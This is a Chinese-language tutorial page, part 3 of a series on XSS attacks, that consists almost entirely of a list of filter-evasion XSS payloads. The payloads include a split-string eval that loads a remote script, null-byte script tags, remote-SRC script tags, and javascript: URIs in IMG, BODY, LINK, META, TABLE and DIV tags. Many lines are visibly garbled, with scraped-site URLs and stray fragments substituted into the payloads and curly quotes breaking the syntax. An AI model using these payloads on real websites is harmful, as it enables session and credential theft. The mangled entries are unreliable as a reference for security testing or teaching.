这一次，彻底理解XSS攻击 (3)

解决限制字符(要求同页面)，示例如下：

<script>z=z+ ’write(“‘</script> <script>z=z+ ’<script’</script> <script>z=z+ ’ src=http://www.likecs.com/ht’</script> <script>z=z+ ’tp://ww’</script> <script>z=z+ ’w.shell’</script> <script>z=z+ ’.net/1.’</script> <script>z=z+ ’js></sc’</script> <script>z=z+ ’ript>”)’</script> <script>eval_r(z)</script>

空字符，示例如下：

perl -e ‘print “<IMG SRC=http://www.likecs.com/java\0script:alert(\”XSS\”)>”;’ > out

空字符2,空字符在国内基本没效果.因为没有地方可以利用，示例如下：

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

Spaces和meta前的IMG标签，示例如下：

<IMG SRC=http://www.likecs.com/\'#\'" javascript:alert(‘XSS’);”>

Non-alpha-non-digit XSS，示例如下：

<SCRIPT/XSS SRC=http://www.likecs.com/\'#\'" /span>”></SCRIPT>

Non-alpha-non-digit XSS to 2，示例如下：

<BODY onload!#$%&()*~+ -_.,:;?@[/|\]^`=alert(“XSS”)>

Non-alpha-non-digit XSS to 3，示例如下：

<SCRIPT/SRC=http://www.likecs.com/\'#\'" /span>”></SCRIPT>

双开括号，示例如下：

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

无结束脚本标记(仅火狐等浏览器)，示例如下：

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

无结束脚本标记2，示例如下：

<SCRIPT SRC=http://www.likecs.com//3w.org/XSS/xss.js>

半开的HTML/JavaScript XSS，示例如下：

<IMG SRC=http://www.likecs.com/\'#\'" /span>

双开角括号，示例如下：

<iframe src=http://3w.org/XSS.html <

无单引号 双引号 分号，示例如下：

<SCRIPT>a=http://www.likecs.com/XSS/ alert(a.source)</SCRIPT>

换码过滤的JavaScript，示例如下：

\”;alert(‘XSS’);//

结束Title标签，示例如下：

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

Input Image，示例如下：

<INPUT SRC=http://www.likecs.com/\'#\'" /span>

BODY Image，示例如下：

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

BODY标签，示例如下：

<BODY(‘XSS’)>

IMG Dynsrc，示例如下：

<IMG DYNSRC=http://www.likecs.com/\'#\'" /span>

IMG Lowsrc，示例如下：

<IMG LOWSRC=http://www.likecs.com/\'#\'" /span>

BGSOUND，示例如下：

<BGSOUND SRC=http://www.likecs.com/\'#\'" /span>

STYLE sheet，示例如下：

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

远程样式表，示例如下：

<LINK REL=”stylesheet” HREF=http://www.likecs.com/”http:/3w.org/xss.css”>

List-style-image(列表式)，示例如下：

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

IMG VBscript，示例如下：

<IMG SRC=http://www.likecs.com/\'#\'" /STYLE><UL><LI>XSS

META链接url，示例如下：

<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

Iframe，示例如下：

<IFRAME SRC=http://www.likecs.com/\'#\'" /IFRAME>

Frame，示例如下：

<FRAMESET><FRAME SRC=http://www.likecs.com/\'#\'" /FRAMESET>

Table，示例如下：

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

TD，示例如下：

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

DIV background-image，示例如下：

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>